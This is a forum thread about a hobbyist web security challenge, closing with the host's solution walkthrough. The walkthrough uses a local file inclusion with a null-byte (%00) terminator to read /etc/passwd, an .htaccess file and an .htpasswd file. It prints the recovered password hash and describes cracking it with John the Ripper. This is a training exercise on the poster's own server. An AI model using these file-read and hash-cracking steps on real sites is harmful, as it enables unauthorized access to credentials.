Security Challenge

Procasinator wrote: »

You could probably do that at the router, if were happy for that machine not too see the rest of the network. Unless you have more than one adapter, where you could then just lock down for the adapter the VM is using.

Of course, depends on your configuration.

I might (no promises :P) develop a quick challenge that satisfies your 4 points, if you are willing to host it?

Plus don't want anyone accessing my router admin/configs :-)

dlofnep wrote: »

Perhaps a bit of SQLi for the next challenge. Just a basic db driven auth system with an admin account - username, md5 encrypted password. Gain admin will allow you to add your name to the wall of fame. If you need any help with code just let me know.

Later on you could try add some simple filtering, that would require filter evasion to complete the same attack.

Maybe a load_file() vuln at a later date.

Lot's of ideas I have. I would have coded them before, but I just don't have DB access on my shell, and limited disk space.

Funny you mentioned that as I was thinking about something similar to above with some other twists. Its a pit of a pain hosting it on my laptop though.

This challenge is going off-line tomorrow evening, just so you are aware in case you want to try this challenge.

dlofnep wrote: »

Thanks for being a gracious host If you need any help with coding for the next one, drop me a line.

Will do, cheers.

Ok this challenge is over and the solution is posted below. I will leave the server up for a few hours if anyone wants to run through the solution. I have also attached the webserver files so you can take a look through if you want to host a similar challenge.


Hall Of Fame:

dregin
Pygmalion
dlofnep
Livewire
lithiumoxide
CheeseCake Monster
Procasinator
nemo
isaac702
Robert Tables
trout
fcerullo
d_fens
rockethamster
fLa
Muelli
Sigtran
Ack Attack

SOLUTION:

Your aim is to get your name on the hall of fame.

Lets see what web server the host is running. Lets read a HTTP header from the web server. There are several ways to do this. There are 100's of tools to do this, one been nmap. There is also browser plug-ins e.g. https://addons.mozilla.org/sl/firefox/addon/live-http-headers/, but if you want an even quicker solution, just use: http://web-sniffer.net/


As you can see we are running:

Name    Value    Delim
Status: HTTP/1.1 200 OK
Date:    Fri, 11 Feb 2011 09:16:26 GMT   
Server:    Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch   
X-Powered-By:    PHP/5.2.6-1+lenny9   
Vary:    Accept-Encoding   
Content-Encoding:    gzip   
Content-Length:    815   
Connection:    close   
Content-Type:    text/html

Apache and php are very up to date versions. So lets ignore looking for a known exploit for now. Take a look around the site to see what we fine. the [admin] link should catch your eye very quickly. You can see this is a hyperlink to the "admin/" directory. Clicking on it, you can see that it asks for a user-name/password. It asks for it in a dialog form, and not a html/php interface.

The first thing I would Google is: Apache directory password. First result is: Authentication, Authorization and Access Control - Apache HTTP Server - http://httpd.apache.org/docs/2.0/howto/auth.html

Reading through this article you can conclude that the directory auth configuration will either go in the main httpd.conf or in a .htaccess file inside the protected directory. This will then contain a link to a .htpasswd file that should not be readable by the web-server.

So thinking we need to read that .htaccess file would be a good guess. Everyone will at first try damo.dyndns.info/admin/.htaccess however first, you need to have a successful login to erad the contents of admin/ and second, Apache by default is configured to ignore requests for files names .ht*. So we need to find another way to read this file. Take a look at the source code of the main page. You will see links like: index.php?page=about , index.php?page=main .

Maybe "about" and "main" are actual files on the server? Lets try damo.dyndns.info/about Damn 404, lets try damo.dyndns.info/about.php ...success! It looks like the page argument to index.php is taking in file names to read. Maybe the web developer hasn't properly sanitized input? Lets try a LFI attack (Local File Include). damo.dyndns.info/index.php?page=/etc/passwd Damn, were you feeling lucky? Take a closer look at the error message: "Failed opening '/etc/passwd.php' for inclusion".

Hmm we didn't put on a ".php"? Maybe index.php is automatically doing this? Maybe we can use some operators or characters to fool the php script to ignore the '.php' appended. Quick Google of: LFI terminate string, you will come across http://www.scribd.com/doc/35882618/lfi-paper which describes this exact scenario and how to get around it. We can terminate the string with a null byte (0x00). A http request, we can represent this byte as %00, so lets try that. damo.dyndns.info/index.php?page=/etc/passwd%00 and SUCCESS. Note: since PHP3/4 a feature called "magic quotes" is enabled by default, (it was disabled for this challenge) which would result in the byte above been escaped e.g. \0 therefore this approach wouldn't work. You can still bypass magic quotes when it comes to sql injection however. It also must be stated that alot of web servers have magic quotes disabled due to it causing problems with many 3rd party php web apps available for public use, and even local php apps to the server in question. More information about this here: http://en.wikipedia.org/wiki/Magic_quotes#Criticism

Now lets get that .htaccess file. damo.dyndns.info/index.php?page=admin/.htaccess%00 This gives us:

AuthType Basic
AuthName "Restricted Access!"
AuthUserFile /home/challenge/.htpasswd
Require user moderator

Now we know hat the username is "moderator and the hidden location of the htpasswd file". Read that too! damo.dyndns.info/index.php?page=/home/challenge/.htpasswd%00 gives us: moderator:$apr1$rr7qqTbV$CZIdIGOVUAcVDMUrWEm8a/

Lets look here to see what this is: http://httpd.apache.org/docs/2.2/misc/password_encryptions.html "Apache-specific algorithm using an iterated (1,000 times) MD5 digest" hmm, if you already ran John the Ripper against this, you may have seen "no hash loaded" or similar. Quickly googling around you see that there are patches for John the Ripper to support this "Apache MD5" Hint: the "jumbo" version of John the Ripper includes many patches for lots of different hash's. http://openwall.info/wiki/john/custom-builds to get a copy.

Also a rule of thumb is to run a dictionary attack before you resort to brute forcing, you may get lucky and it will save you a hell of a lot of time if you do. I would recommend a large dictionary/wordlist compared to the default one included with JtR. e.g. http://zip-password-cracker.com/files/english.zip...

So try a dictionary attach against your acquired .htpasswd file using your large wordlist, and if your lucky, you will have a login for damo.dyndns.info/admin/ :-)

That is all!